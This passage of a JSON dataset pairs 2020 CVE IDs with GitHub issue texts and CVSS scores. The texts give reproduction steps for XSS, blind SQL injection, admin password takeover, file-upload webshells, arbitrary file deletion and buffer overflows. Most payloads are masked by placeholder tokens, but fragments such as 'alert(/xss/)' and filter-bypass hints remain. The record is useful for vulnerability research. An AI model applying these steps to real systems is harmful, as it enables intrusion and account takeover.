  56200. },
  56201. {
  56202. "CVE_ID": "CVE-2020-23691",
  56203. "Issue_Url_old": "https://github.com/lxw1844912514/YFCMF/issues/1",
  56204. "Issue_Url_new": "https://github.com/lxw1844912514/yfcmf/issues/1",
  56205. "Repo_new": "lxw1844912514/yfcmf",
  56206. "Issue_Created_At": "2020-06-21T12:42:32Z",
  56207. "description": "YFCMF NUMBERTAG has rce vulnerability. When we built this website cms locally and visit APITAG payload through post: get FILETAG get FILETAG",
  56208. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56209. "severity": "CRITICAL",
  56210. "baseScore": 9.8,
  56211. "impactScore": 5.9,
  56212. "exploitabilityScore": 3.9
  56213. },
  56214. {
  56215. "CVE_ID": "CVE-2020-23697",
  56216. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/463",
  56217. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/463",
  56218. "Repo_new": "monstra-cms/monstra",
  56219. "Issue_Created_At": "2020-05-22T17:32:50Z",
  56220. "description": "Cross Site Script Vulnerability on APITAG in Monstra version NUMBERTAG Hii, Team Monstra!!! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel Monstra NUMBERTAG Go to APITAG NUMBERTAG Click APITAG New' > APITAG NUMBERTAG Insert Payload XSS: \"> APITAG '> APITAG // \"> APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Save and Exit NUMBERTAG Click APITAG new > xss alert message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots Infor Monstra version: FILETAG E NUMBERTAG payload xss: a. Creat new page: FILETAG b. click page: FILETAG c. xss alert mess: FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version: I Hope you fix it ASAP!!!!",
  56221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56222. "severity": "MEDIUM",
  56223. "baseScore": 5.4,
  56224. "impactScore": 2.7,
  56225. "exploitabilityScore": 2.3
  56226. },
  56227. {
  56228. "CVE_ID": "CVE-2020-23700",
  56229. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/319",
  56230. "Issue_Url_new": "https://github.com/lavalite/cms/issues/319",
  56231. "Repo_new": "lavalite/cms",
  56232. "Issue_Created_At": "2020-05-20T09:20:04Z",
  56233. "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Links\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click PATHTAG NUMBERTAG Select a function then press Edit NUMBERTAG Insert payload to Name: '> APITAG FILETAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site.",
  56234. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  56235. "severity": "MEDIUM",
  56236. "baseScore": 4.8,
  56237. "impactScore": 2.7,
  56238. "exploitabilityScore": 1.7
  56239. },
  56240. {
  56241. "CVE_ID": "CVE-2020-23705",
  56242. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/25",
  56243. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/25",
  56244. "Repo_new": "rockcarry/ffjpeg",
  56245. "Issue_Created_At": "2020-06-22T08:20:48Z",
  56246. "description": "global buffer overflow in function jfif_encode at APITAG Describe A global buffer overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at APITAG Reproduce Tested in Ubuntu NUMBERTAG bit. Compile ffjpeg with address sanitizer as I changed CCFLAGS APITAG as: APITAG And do this command to reproduce this issue: APITAG poc is here URLTAG Expected behavior An attacker can exploit this vulnerability by submitting a malicious jpeg that exploits this issue. This will result in a Denial of Service APITAG and when the application attempts to process the file. ASAN Reports ERRORTAG",
  56247. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56248. "severity": "MEDIUM",
  56249. "baseScore": 6.5,
  56250. "impactScore": 3.6,
  56251. "exploitabilityScore": 2.8
  56252. },
  56253. {
  56254. "CVE_ID": "CVE-2020-23706",
  56255. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/7",
  56256. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/7",
  56257. "Repo_new": "brackeen/ok-file-formats",
  56258. "Issue_Created_At": "2020-06-26T12:25:34Z",
  56259. "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Reproduce test program CODETAG Tested in Ubuntu NUMBERTAG bit. Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG . APITAG Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG . Fuzzer & Testcase Fuzzer is AFL. Testcase is your testcase URLTAG in dir PATHTAG",
  56260. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56261. "severity": "MEDIUM",
  56262. "baseScore": 6.5,
  56263. "impactScore": 3.6,
  56264. "exploitabilityScore": 2.8
  56265. },
  56266. {
  56267. "CVE_ID": "CVE-2020-23707",
  56268. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/8",
  56269. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/8",
  56270. "Repo_new": "brackeen/ok-file-formats",
  56271. "Issue_Created_At": "2020-06-26T12:31:02Z",
  56272. "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Reproduce test program CODETAG Tested in Ubuntu NUMBERTAG bit. Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG . APITAG Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG . Fuzzer & Testcase Fuzzer is AFL. Testcase is your testcase URLTAG in dir PATHTAG",
  56273. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56274. "severity": "MEDIUM",
  56275. "baseScore": 6.5,
  56276. "impactScore": 3.6,
  56277. "exploitabilityScore": 2.8
  56278. },
  56279. {
  56280. "CVE_ID": "CVE-2020-23711",
  56281. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/20",
  56282. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/20",
  56283. "Repo_new": "navigatecms/navigate-cms",
  56284. "Issue_Created_At": "2020-06-19T07:54:57Z",
  56285. "description": "Blind SQL Injection Vulnerability Navigate CMS NUMBERTAG Expected behaviour Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category . Impact Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully: Reading, updating and deleting arbitrary data or tables from the database. Executing commands on the underlying operating system. Steps to reproduce Inject payload on the category via request: URLTAG Payload: APITAG APITAG / FILETAG Payload: APITAG APITAG / FILETAG Payload: APITAG APITAG / FILETAG",
  56286. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56287. "severity": "CRITICAL",
  56288. "baseScore": 9.8,
  56289. "impactScore": 5.9,
  56290. "exploitabilityScore": 3.9
  56291. },
  56292. {
  56293. "CVE_ID": "CVE-2020-23718",
  56294. "Issue_Url_old": "https://github.com/xujinliang/zibbs/issues/4",
  56295. "Issue_Url_new": "https://github.com/xujinliang/zibbs/issues/4",
  56296. "Repo_new": "xujinliang/zibbs",
  56297. "Issue_Created_At": "2020-06-18T07:51:59Z",
  56298. "description": "The function parameter FILETAG Directly trace to the FILETAG file. After analysis, this CMS handles the processing of each controller and operation through \u3010route\u3011, wherein the parameter route is the controller name and action name to be filled in in this GET request. FILETAG FILETAG A normal GET request would look like this URLTAG FILETAG And here the parameter \u3010route\u3011 is controllable, The value of the input parameter \u3010route\u3011 is processed as follows, The value of the parameter\u3010router\u3011is first split through APITAG as route=aaa/bbb, the aaa Is the controller name,bbb for the action of, It also makes conditional judgments about whether the controller and the action name exist, When the Controller name does not exist, it will directly output \"aaa Controller Controller does not exist NUMBERTAG as shown below FILETAG FILETAG This is for the parameter \u3010route\u3011, If the controller doesn't exist, The value of the input parameter \u3010route\u3011 is displayed directly, And the following values, without XSS filtering, Only the APITAG method is done here, and there is no XSS filtering function in this aspect FILETAG Because there is no filtering here, there is reflective XSS, which is tested as follows Because of the split for / here, the regular XSS payload cannot be taken from a bomb frame, so using the following XSS payload can make a bomb fram APITAG URLTAG FILETAG FILETAG The following test statement can also cause a pop up as normal route=admin/ APITAG FILETAG Solution\uff1a filter or encode special characters like this < > \" ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...",
  56299. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  56300. "severity": "CRITICAL",
  56301. "baseScore": 9.6,
  56302. "impactScore": 6.0,
  56303. "exploitabilityScore": 2.8
  56304. },
  56305. {
  56306. "CVE_ID": "CVE-2020-23719",
  56307. "Issue_Url_old": "https://github.com/xujinliang/zibbs/issues/5",
  56308. "Issue_Url_new": "https://github.com/xujinliang/zibbs/issues/5",
  56309. "Repo_new": "xujinliang/zibbs",
  56310. "Issue_Created_At": "2020-06-23T03:15:15Z",
  56311. "description": "Background setting function APITAG XSS vulnerabilities. First log in to the background and go to the background APITAG the storage XSS vulnerabilities of chicken ribs\uff09 FILETAG Description here\uff08HTML syntax APITAG there is an XSS APITAG the parameter \u3010bbsmeta\u3011here by grabbing the APITAG in the source code PATHTAG code FILETAG This was filtered by APITAG and htmlspecialchar () Obviously when you insert the data into the database you will have a layer of filtering, and then you will continue to track the specific page output location of this parameter to the following PATHTAG code FILETAG When the page is output here, the following function is made for the parameter \u3010bbsmeta\u3011to handle htmlspecialchars_decode The storage XSS here results in the storage XSS due to the use APITAG function, So through the black box to verify Insert the following test statement in the background and click Update payload: APITAG alert(/xss/) APITAG FILETAG The XSS is then accessed directly to the foreground and executed successfully APITAG FILETAG FILETAG Solution\uff1a filter or encode special characters like this < > \" ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...",
  56312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  56313. "severity": "CRITICAL",
  56314. "baseScore": 9.6,
  56315. "impactScore": 6.0,
  56316. "exploitabilityScore": 2.8
  56317. },
  56318. {
  56319. "CVE_ID": "CVE-2020-23721",
  56320. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/559",
  56321. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/559",
  56322. "Repo_new": "daylightstudio/fuel-cms",
  56323. "Issue_Created_At": "2020-06-23T08:53:30Z",
  56324. "description": "bypass filter XSS vulnerability. HI: The attacker bypasses the filter In this pages page! POC: APITAG APITAG APITAG and you can fix it!! thank you",
  56325. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56326. "severity": "MEDIUM",
  56327. "baseScore": 5.4,
  56328. "impactScore": 2.7,
  56329. "exploitabilityScore": 2.3
  56330. },
  56331. {
  56332. "CVE_ID": "CVE-2020-23722",
  56333. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/560",
  56334. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/560",
  56335. "Repo_new": "daylightstudio/fuel-cms",
  56336. "Issue_Created_At": "2020-06-24T02:12:08Z",
  56337. "description": "General users can modify the administrator password vulnerability. General users can modify the administrator password and account information vulnerability . for example: The account test NUMBERTAG can change the admin password!!! step NUMBERTAG log in test NUMBERTAG APITAG Step NUMBERTAG edit Any non administrator account\uff1a APITAG APITAG Step NUMBERTAG Save the change: APITAG Then Intercept the packets and change the \"id\" and \"__fuel_id__\" value NUMBERTAG APITAG APITAG Success : APITAG Step NUMBERTAG log in admin use new password \uff1a APITAG APITAG APITAG",
  56338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  56339. "severity": "HIGH",
  56340. "baseScore": 8.8,
  56341. "impactScore": 5.9,
  56342. "exploitabilityScore": 2.8
  56343. },
  56344. {
  56345. "CVE_ID": "CVE-2020-23754",
  56346. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2315",
  56347. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2315",
  56348. "Repo_new": "php-fusion/PHP-Fusion",
  56349. "Issue_Created_At": "2020-05-11T10:50:27Z",
  56350. "description": "Cross Site Script Vulnerability on APITAG in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG To Reproduce Steps to reproduce the behavior: Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click add Poll NUMBERTAG Insert Payload // \"> APITAG NUMBERTAG Save Poll: XSS alert Message! Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots Link image APITAG URLTAG Desktop (please complete the following information): OS: Windows Browser: All",
  56351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  56352. "severity": "CRITICAL",
  56353. "baseScore": 9.6,
  56354. "impactScore": 6.0,
  56355. "exploitabilityScore": 2.8
  56356. },
  56357. {
  56358. "CVE_ID": "CVE-2020-23765",
  56359. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1218",
  56360. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1218",
  56361. "Repo_new": "bludit/bludit",
  56362. "Issue_Created_At": "2020-06-27T17:44:40Z",
  56363. "description": "Bludit NUMBERTAG Admin File Upload vulnerability. Describe your problem A file upload vulnerability was discovered in Bludit NUMBERTAG Hackers need administrator rights. Hacker can use a backup file to control the server. Steps to reproduce the problem NUMBERTAG Download the latest version of bludit from APITAG NUMBERTAG Using burpsuite when uploading logo in the background. Change picture content to PHP code APITAG FILETAG NUMBERTAG Enable backup APITAG and download a backup file, modify the extension of logo file directly in the zip file. If you unzip the backup to modify it, the upload will be blocked by WAF. FILETAG FILETAG FILETAG NUMBERTAG Access _ FILETAG to get the getshell FILETAG Vulnerability in PATHTAG ERRORTAG We can check the image content uploaded by users. Or just delete the backup module Bludit version NUMBERTAG PHP version APITAG",
  56364. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  56365. "severity": "HIGH",
  56366. "baseScore": 7.2,
  56367. "impactScore": 5.9,
  56368. "exploitabilityScore": 1.2
  56369. },
  56370. {
  56371. "CVE_ID": "CVE-2020-23766",
  56372. "Issue_Url_old": "https://github.com/danpros/htmly/issues/412",
  56373. "Issue_Url_new": "https://github.com/danpros/htmly/issues/412",
  56374. "Repo_new": "danpros/htmly",
  56375. "Issue_Created_At": "2020-07-02T21:10:33Z",
  56376. "description": "Arbitrary file deletion vulnerability was found in NUMBERTAG ulnerability description Arbitrary file deletion vulnerability was found in APITAG need administrator rights and they can use any absolute directory to delete any file in the server. Steps to reproduce the problem Using APITAG source code to build the local environment. PHP NUMBERTAG Apache NUMBERTAG Windows NUMBERTAG FILETAG Enter the backup APITAG a backup and delete it. At the same time, use burpsuite to capture the package. FILETAG Enter the absolute path of the file you want to delete here. The relative path is OK FILETAG The file has been deleted. FILETAG I think there's something wrong with the code here. PATHTAG ERRORTAG It does not control the path entered by the user, nor does it detect whether the file belongs to backup",
  56377. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  56378. "severity": "MEDIUM",
  56379. "baseScore": 6.5,
  56380. "impactScore": 5.2,
  56381. "exploitabilityScore": 1.2
  56382. },
  56383. {
  56384. "CVE_ID": "CVE-2020-23768",
  56385. "Issue_Url_old": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/1",
  56386. "Issue_Url_new": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/1",
  56387. "Repo_new": "whiskey-jj/w2s2x2222.github.io",
  56388. "Issue_Created_At": "2020-07-23T05:37:41Z",
  56389. "description": "PHPYUN NUMBERTAG UTF NUMBERTAG Beta has a stored XSS vulnerability. Vulnerability description Phpyun is an efficient solution for recruitment and employment of talents and enterprises based on PHP and the APITAG database. There is a stored cross-site scripting vulnerability in phpyun. An attacker can exploit the vulnerability to obtain administrator cookies. Reproducing the vulnerability FILETAG Set up the environment locally FILETAG Register as a regular user, enter APITAG and submit questions. Fuzzing finds that most keywords and parentheses are filtered. The structure is as follows APITAG APITAG APITAG FILETAG Enter the administrator page FILETAG FILETAG APITAG FILETAG Because the onbounce tag is used, it takes a long time to pop up the APITAG you can see that the code was parsed successfully FILETAG This vulnerability has a CNVD number CNVD NUMBERTAG But it will be announced on the official website until NUMBERTAG FILETAG",
  56390. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  56391. "severity": "HIGH",
  56392. "baseScore": 7.5,
  56393. "impactScore": 3.6,
  56394. "exploitabilityScore": 3.9
  56395. },
  56396. {
  56397. "CVE_ID": "CVE-2020-23774",
  56398. "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/2",
  56399. "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/2",
  56400. "Repo_new": "zhonghaozhao/winmail",
  56401. "Issue_Created_At": "2020-06-28T02:42:40Z",
  56402. "description": "A reflected XSS vulnerability exists in the file of Winmail NUMBERTAG which can cause JavaScript code to be executed. A reflected XSS vulnerability exists in the file of Winmail NUMBERTAG which can cause JavaScript code to be executed FILETAG FILETAG FILETAG",
  56403. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56404. "severity": "MEDIUM",
  56405. "baseScore": 6.1,
  56406. "impactScore": 2.7,
  56407. "exploitabilityScore": 2.8
  56408. },
  56409. {
  56410. "CVE_ID": "CVE-2020-23776",
  56411. "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/3",
  56412. "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/3",
  56413. "Repo_new": "zhonghaozhao/winmail",
  56414. "Issue_Created_At": "2020-06-30T09:17:45Z",
  56415. "description": "An SSRF vulnerability exists in the file of Winmail NUMBERTAG when HTTPS is on. An SSRF vulnerability exists in the file of Winmail NUMBERTAG when HTTPS is on. The attacker can use this vulnerability to cause the server to send a request to a specified URL. FILETAG",
  56416. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  56417. "severity": "HIGH",
  56418. "baseScore": 7.5,
  56419. "impactScore": 3.6,
  56420. "exploitabilityScore": 3.9
  56421. },
  56422. {
  56423. "CVE_ID": "CVE-2020-23814",
  56424. "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/1866",
  56425. "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/1866",
  56426. "Repo_new": "xuxueli/xxl-job",
  56427. "Issue_Created_At": "2020-07-30T09:30:54Z",
  56428. "description": "NUMBERTAG Stored XSS vulnerabilities. Locate the executor management function: FILETAG Insert the PoC there; there is front-end validation, but by code audit I find that the back end only has a length APITAG be bypassed by Burp Intercept. FILETAG The code directly gets APITAG and manually entered parameters for front-end display. No filtering or encoding APITAG stored XSS vulnerabilities. FILETAG The page automatically reloads and triggers the XSS every NUMBERTAG seconds. FILETAG FILETAG",
  56429. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56430. "severity": "MEDIUM",
  56431. "baseScore": 6.1,
  56432. "impactScore": 2.7,
  56433. "exploitabilityScore": 2.8
  56434. },
  56435. {
  56436. "CVE_ID": "CVE-2020-23836",
  56437. "Issue_Url_old": "https://github.com/siamon123/warehouse-inventory-system/issues/55",
  56438. "Issue_Url_new": "https://github.com/siamon123/warehouse-inventory-system/issues/55",
  56439. "Repo_new": "siamon123/warehouse-inventory-system",
  56440. "Issue_Created_At": "2020-08-10T05:11:52Z",
  56441. "description": "CSRF Change Admin Password. Cross Site Request Forgery (CSRF) on APITAG page allows changing the admin password from a NUMBERTAG rd party site. For fix see: FILETAG",
  56442. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56443. "severity": "HIGH",
  56444. "baseScore": 8.8,
  56445. "impactScore": 5.9,
  56446. "exploitabilityScore": 2.8
  56447. },
  56448. {
  56449. "CVE_ID": "CVE-2020-23839",
  56450. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330",
  56451. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1330",
  56452. "Repo_new": "getsimplecms/getsimplecms",
  56453. "Issue_Created_At": "2020-08-12T20:38:56Z",
  56454. "description": "Reflected Cross Site Scripting (XSS) vulnerability in APITAG CMS NUMBERTAG in APITAG. A reflected cross-site scripting (XSS) vulnerability in APITAG CMS NUMBERTAG in the APITAG login portal webpage allows remote attackers to execute APITAG code in the client's browser and harvest login credentials when the client clicks a link, enters credentials, and submits the login form.",
  56455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56456. "severity": "MEDIUM",
  56457. "baseScore": 6.1,
  56458. "impactScore": 2.7,
  56459. "exploitabilityScore": 2.8
  56460. },
  56461. {
  56462. "CVE_ID": "CVE-2020-23849",
  56463. "Issue_Url_old": "https://github.com/josdejong/jsoneditor/issues/1029",
  56464. "Issue_Url_new": "https://github.com/josdejong/jsoneditor/issues/1029",
  56465. "Repo_new": "josdejong/jsoneditor",
  56466. "Issue_Created_At": "2020-07-01T03:41:10Z",
  56467. "description": "In tree mode, there exists a stored XSS vulnerability. Insert a PoC URLTAG FILETAG click the drop-down list box FILETAG click the input tag FILETAG",
  56468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56469. "severity": "MEDIUM",
  56470. "baseScore": 6.1,
  56471. "impactScore": 2.7,
  56472. "exploitabilityScore": 2.8
  56473. },
  56474. {
  56475. "CVE_ID": "CVE-2020-23851",
  56476. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/27",
  56477. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/27",
  56478. "Repo_new": "rockcarry/ffjpeg",
  56479. "Issue_Created_At": "2020-07-02T10:41:13Z",
  56480. "description": "ffjpeg \"jfif_decode\" function stack buffer overflow vulerability. ffjpeg \"jfif_decode\" function stack buffer overflow vulerability Description: There is a stack buffer overflow bug in jfif_decode(void ctxt, BMP pb) function at PATHTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. The bug is caused by the dangerous pointer variable using as follow: x = ((mcui % mcuc) mcuw + h NUMBERTAG jfif >comp_info c].samp_factor_h / sfh_max; y = ((mcui / mcuc) mcuh NUMBERTAG jfif APITAG / sfv_max; idst = yuv_datbuf[c] + y yuv_stride[c] + x; the variable yuv_datbuf is an integer pointer array, but there is no security check before the using of yuv_datbuf (jfif.c: line NUMBERTAG We used APITAG instrumented in ffjpeg and triggered this bug, the output of asan as follow: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff9fa0bfd8 at pc NUMBERTAG f NUMBERTAG f bp NUMBERTAG fff9f READ of size NUMBERTAG at NUMBERTAG fff9fa0bfd8 thread T NUMBERTAG f NUMBERTAG e in jfif_decode PATHTAG NUMBERTAG ed NUMBERTAG in main PATHTAG NUMBERTAG fcbfd NUMBERTAG eb NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG fff9fa0bfd8 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f NUMBERTAG f in jfif_decode PATHTAG This frame has NUMBERTAG object(s NUMBERTAG ftab' (line NUMBERTAG dc' (line NUMBERTAG yuv_stride' (line NUMBERTAG yuv_datbuf' (line NUMBERTAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG f2 f NUMBERTAG f2 f NUMBERTAG f2]f2 f2 f2 f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG f NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after 
scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING We could clearly observe the stack overflow in jfif_decode function at NUMBERTAG f NUMBERTAG e, and the variable yuv_datbuf was overflowing. Lastly, we used GDB to debug this bug, the GDB outputs: Reading symbols from . APITAG gdb peda$ set args d APITAG gdb peda$ b NUMBERTAG f NUMBERTAG e Breakpoint NUMBERTAG at NUMBERTAG f NUMBERTAG e: file jfif.c, line NUMBERTAG gdb peda$ r Starting program: PATHTAG d APITAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffe NUMBERTAG ffff6e NUMBERTAG APITAG : mov rax,QWORD PTR [rip NUMBERTAG ffff NUMBERTAG f NUMBERTAG APITAG ) RC NUMBERTAG ffffffffbff NUMBERTAG RD NUMBERTAG RSI NUMBERTAG b NUMBERTAG fede NUMBERTAG RDI NUMBERTAG fffffffdff NUMBERTAG b NUMBERTAG APITAG RBP NUMBERTAG fffffffe3d NUMBERTAG fffffffe4c NUMBERTAG ee NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffded NUMBERTAG f NUMBERTAG f ( APITAG : call NUMBERTAG b6cc0 APITAG RIP NUMBERTAG ffffffffcd4b6cc0 R NUMBERTAG fede NUMBERTAG R NUMBERTAG ffffffffc NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG f NUMBERTAG f NUMBERTAG R NUMBERTAG ffffffffc1a NUMBERTAG R NUMBERTAG R NUMBERTAG fb R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero SIGN trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4b6cc0 [ stack NUMBERTAG fffffffded NUMBERTAG f NUMBERTAG f ( APITAG : call NUMBERTAG b6cc0 APITAG NUMBERTAG fffffffdee NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffdee NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffdef NUMBERTAG f NUMBERTAG APITAG : push rbp NUMBERTAG fffffffdef NUMBERTAG fffffffdf 
NUMBERTAG c NUMBERTAG c NUMBERTAG fffffffdf NUMBERTAG fffffffdf NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4b6cc0 in ?? () We ensured there is a stack overflow bugs, which will be used to finish a APITAG attack. You can reproduce this stack overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG",
  56481. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56482. "severity": "MEDIUM",
  56483. "baseScore": 5.5,
  56484. "impactScore": 3.6,
  56485. "exploitabilityScore": 1.8
  56486. },
  56487. {
  56488. "CVE_ID": "CVE-2020-23852",
  56489. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/28",
  56490. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/28",
  56491. "Repo_new": "rockcarry/ffjpeg",
  56492. "Issue_Created_At": "2020-07-02T11:43:44Z",
  56493. "description": "ffjpeg \"jfif_decode\" function heap overflow vulnerabilities. ffjpeg \"jfif_decode\" function heap overflow vulnerabilities Description: There are two heap overflow bugs in jfif_decode(void ctxt, BMP pb) function at PATHTAG line NUMBERTAG line NUMBERTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. We finded the integer pointer array variable yuv_datbuf FILETAG Lastly, we used GDB to debug this bug, the GDB outputs: gdb peda$ b NUMBERTAG f2f NUMBERTAG Breakpoint NUMBERTAG at NUMBERTAG f2f NUMBERTAG gdb peda$ r Starting program: PATHTAG d hh Thread debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffdd NUMBERTAG a6e NUMBERTAG interceptor_free(void NUMBERTAG test r NUMBERTAG d,r NUMBERTAG d) RC NUMBERTAG ffffff NUMBERTAG RD NUMBERTAG c NUMBERTAG RSI NUMBERTAG ffffefcb NUMBERTAG RDI NUMBERTAG be RBP NUMBERTAG fffffffe3f NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffda NUMBERTAG f2f0a ( APITAG : 